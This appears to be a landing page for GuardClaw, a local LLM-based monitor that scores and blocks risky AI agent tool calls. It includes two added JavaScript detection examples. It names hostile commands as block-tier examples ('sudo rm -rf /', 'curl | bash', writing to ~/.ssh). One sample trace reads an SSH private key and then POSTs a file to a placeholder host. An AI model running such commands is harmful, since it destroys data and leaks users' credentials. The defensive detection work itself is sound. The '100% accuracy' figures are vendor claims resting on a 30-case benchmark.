Monitoring AI agents in real-time

Security for AI Agents

Every tool call risk-scored before execution by a local LLM.
Works with OpenClaw, Claude Code, Gemini CLI, and nanobot.
100% private. Zero cloud. Complete visibility.

[Screenshot: GuardClaw Dashboard — real-time AI agent security monitoring]

  • 100% Local & Private
  • 100% Benchmark Accuracy
  • ~2s Per Analysis
  • $0 Cloud Cost

Built for AI Agent Safety

Monitor, analyze, and optionally block dangerous tool calls — all running locally on your machine.

Real-Time Visibility

See every tool call as it happens — exec, read, write, browser, message — with AI-generated summaries and full details.

LLM-Powered Judgment

A local LLM judge analyzes each command for intent and risk. Understands context, not just pattern matching.

Chain Analysis

Detects multi-step attack patterns. Reading SSH keys then curling an external server? Caught and flagged.
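The chain described above (a read of SSH keys followed by a call to an external server), as an added detection example that is not GuardClaw's own code; the event shape, the secret-path list and the five-step window are assumptions:

```javascript
// Added example (not GuardClaw's code): a minimal chain detector for the
// "read credentials, then contact an external host" pattern. The event shape
// { tool, path, command }, the secret-path list and the window are assumed.
const LOCAL_HOSTS = new Set(["localhost", "127.0.0.1", "::1"]);
const SECRET_PATHS = [/(^|\/)\.ssh\//, /(^|\/)\.aws\/credentials$/, /(^|\/)\.env$/];

// True when a single event reads credential material (read tool or shell read).
function readsSecret(ev) {
  if (ev.tool === "read") return SECRET_PATHS.some((re) => re.test(ev.path || ""));
  if (ev.tool === "exec") return /\b(cat|head|tail|base64)\b[^|;&]*\.ssh\//.test(ev.command || "");
  return false;
}

// True when a shell event sends traffic to a host other than the local machine.
function contactsExternal(ev) {
  if (ev.tool !== "exec") return false;
  const m = /\b(curl|wget)\b[^|;&]*?https?:\/\/([^\/\s:]+)/.exec(ev.command || "");
  return Boolean(m) && !LOCAL_HOSTS.has(m[2]);
}

// Walks a trace in order and returns the first (read, external call) pair
// within `window` later steps, or null when no such chain exists.
function findExfilChain(trace, window = 5) {
  for (let i = 0; i < trace.length; i++) {
    if (!readsSecret(trace[i])) continue;
    for (let j = i + 1; j < trace.length && j <= i + window; j++) {
      if (contactsExternal(trace[j])) return { readIndex: i, exfilIndex: j };
    }
  }
  return null;
}

// Constructed sample trace (not a real session); the chain sits at steps 1 and 3.
const SAMPLE_TRACE = [
  { tool: "read", path: "src/index.js" },
  { tool: "read", path: "/home/dev/.ssh/id_ed25519" },
  { tool: "exec", command: "npm test" },
  { tool: "exec", command: "curl -s -X POST https://example.invalid/upload -d @/tmp/x" },
];
```

A single credential read or a single outbound call is not flagged on its own; only the ordered pair within the window is, which is what keeps the check from firing on ordinary `git push` or `npm install` traffic.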

Active Blocking

High-risk commands pause for your approval before executing. One-click approve or deny from your chat.

Completely Private

All analysis runs on local LLMs via LM Studio or Ollama. Your data never leaves your machine. Ever.

Built-in Benchmark

Test any model's security judgment with 30 tool-trace test cases. See accuracy, false positives, and latency.

Adaptive Memory

Learns from your approve/deny decisions. Risk scores adjust automatically, and frequently approved patterns skip the LLM entirely.

Gemini CLI Integration

New provider onboarding and full event integration for Gemini CLI sessions in the same dashboard.

Product Tour

Security Scan, Judge settings, and menu bar monitoring are part of the same workflow.

[Screenshot: Security Scan page showing clean scan state]

Security Scan

Static audit for MCP config, credentials, and agentic risk patterns.

[Screenshot: Judge backend settings with built-in MLX model]

Judge Settings

Switch local backends and models, and verify judge runtime status.

[Screenshot: Menu bar app with Claude Code tab stats]

Menu Bar Monitoring

Track risk counts across Claude Code and OpenClaw without opening a browser.

[Screenshot: GuardClaw Essential compact menu bar card]

Essential View

Compact status card for connection health and latest high-risk events.

How It Works

GuardClaw sits between your agent and its tools, scoring every action for risk.

1. Agent Acts

Your AI agent calls a tool — exec, write, browser, message, etc.

2. GuardClaw Intercepts

The tool call is captured via WebSocket and sent to your local LLM for analysis.

3. LLM Judges

Risk score (1–10), verdict (SAFE/WARNING/BLOCK), and reasoning — all in ~2 seconds.

4. You Decide

Safe tools run freely. Dangerous tools pause for your approval. Everything is logged.

Three-Tier Verdict System

Every tool call is classified into one of three risk tiers with 100% accuracy on our benchmark.

SAFE

Score 1–3 · Runs freely

Read-only operations, local builds, version control

cat · grep · git commit · npm build

WARNING

Score 4–7 · Logged for review

Potentially impactful but common operations

kill · rm -rf node_modules · chmod · curl POST

BLOCK

Score 8–10 · Requires approval

Dangerous, destructive, or exfiltration attempts

sudo rm -rf / · curl | bash · write ~/.ssh/

🔌 Works with Claude Code

GuardClaw integrates directly with Claude Code via HTTP hooks — no OpenClaw required. Every Bash, Read, Write, and Edit command is risk-scored before execution.

  • Pre-execution blocking — dangerous commands pause in Claude Code's terminal
  • Dashboard approval — approve or deny from the GuardClaw UI
  • Dedicated tab — Claude Code sessions shown separately with full conversation context
  • One-line install — node scripts/install-claude-code.js
  • Works alongside OpenClaw — monitor both platforms from one dashboard
  # Install Claude Code hooks
  node scripts/install-claude-code.js
  # Start GuardClaw
  guardclaw start
  # Done! Every Claude Code tool call is now monitored.

Quick Start

Start GuardClaw, then complete onboarding in the dashboard: Judge → Connections → Security Check → Protection.

  # Install and start GuardClaw
  git clone https://github.com/TobyGE/GuardClaw.git
  cd GuardClaw
  nvm use   # Node 22.x
  npm ci && npm ci --prefix client && npm run verify:native && npm run build
  npm link
  guardclaw start   # → opens localhost:3002

Onboarding Flow (Recommended)

  1. Judge: pick Built-in MLX, LM Studio, or Ollama and activate a model
  2. Connections: install hooks/plugin for Claude Code, Gemini CLI, or OpenClaw
  3. Security Check: run the initial scan for skills, hooks, MCP servers, and plugins
  4. Protection: choose Strict (recommended), Balanced, or Monitor mode

Strict enables fail-closed by default, so risky calls stop if GuardClaw or the local judge is unavailable.

After installing hooks/plugin, restart the corresponding client to activate interception.
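The three verdict tiers, the Strict-mode fail-closed rule, and the approve-count shortcut from Adaptive Memory, combined into one policy function as an added example that is not GuardClaw's code; the judge result fields, the approval threshold and the pattern key are assumptions:

```javascript
// Added example (not GuardClaw's code): the page's verdict mapping (SAFE 1-3,
// WARNING 4-7, BLOCK 8-10), Strict-mode fail-closed handling, and an approve-count
// shortcut in the spirit of Adaptive Memory. Judge fields, threshold and key are assumed.
const TIERS = [[3, "SAFE"], [7, "WARNING"], [10, "BLOCK"]];

function tierFor(score) {
  if (!Number.isInteger(score) || score < 1 || score > 10) {
    throw new RangeError(`risk score must be an integer 1-10, got ${score}`);
  }
  return TIERS.find(([max]) => score <= max)[1];
}

// Approval memory: pattern key -> times the user approved it. Patterns approved
// at least AUTO_APPROVE_AFTER times (assumed threshold) skip the judge entirely.
const AUTO_APPROVE_AFTER = 3;
const approvals = new Map();

function patternKey(call) {
  // Assumed key: tool name plus the first token of the command or path.
  const target = (call.command || call.path || "").trim().split(/\s+/)[0];
  return `${call.tool}:${target}`;
}

function recordApproval(call) {
  const key = patternKey(call);
  approvals.set(key, (approvals.get(key) || 0) + 1);
}

// judge(call) returns { score, reasoning } from the local LLM, or throws when it is
// unreachable. mode is "strict" (fails closed by default) or "monitor" (observes only).
// Actions: "run" executes, "log" executes but is flagged for review, "pause" holds
// the call until the user approves or denies it.
function decide(call, judge, { mode = "strict", failClosed = mode === "strict" } = {}) {
  if ((approvals.get(patternKey(call)) || 0) >= AUTO_APPROVE_AFTER) {
    return { action: "run", tier: "SAFE", reason: "learned from prior approvals" };
  }
  let result;
  try {
    result = judge(call);
  } catch (err) {
    // Fail-closed: with no verdict available, Strict pauses rather than runs.
    if (mode === "monitor" || !failClosed) return { action: "run", tier: null, reason: "judge unavailable, failing open" };
    return { action: "pause", tier: null, reason: `judge unavailable: ${err.message}` };
  }
  const tier = tierFor(result.score);
  const action = mode === "monitor" || tier === "SAFE" ? "run" : tier === "WARNING" ? "log" : "pause";
  return { action, tier, reason: result.reasoning };
}
```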

Prerequisites

Recommended Models

Works with any model loaded in LM Studio or Ollama. The models below are the ones that have been tested and tuned.

qwen/qwen3-4b (Recommended)

Default model. 100% accuracy on 30-case benchmark. Fast (~2s/call), small footprint (~3GB). Best balance of speed and accuracy.

openai/gpt-oss-20b (Alternative)

98% accuracy with richer reasoning output. Slower but provides more detailed risk explanations. Good for auditing.

Monitor Only — or Full Protection

By default, GuardClaw watches and scores without interfering. Install the plugin to upgrade to active blocking.

  • Pre-execution interception — dangerous tools are paused, not just logged
  • Approval workflow — /approve-last or /deny-last from your chat
  • Auto-retry — approved commands re-execute automatically
  • Fail-closed mode — tools blocked when GuardClaw is offline
  • One-click toggle — switch between monitor and blocking from the dashboard
  # Install the blocking plugin
  guardclaw plugin install
  openclaw gateway restart
  # That's it! Toggle blocking from the 🛡️ button in the dashboard header.

Start Protecting Your Agents

Open source. Runs locally. Takes 60 seconds to set up.

💬 Found a bug, got a feature idea, or stuck on setup?
Open a GitHub issue — every piece of feedback shapes the next release.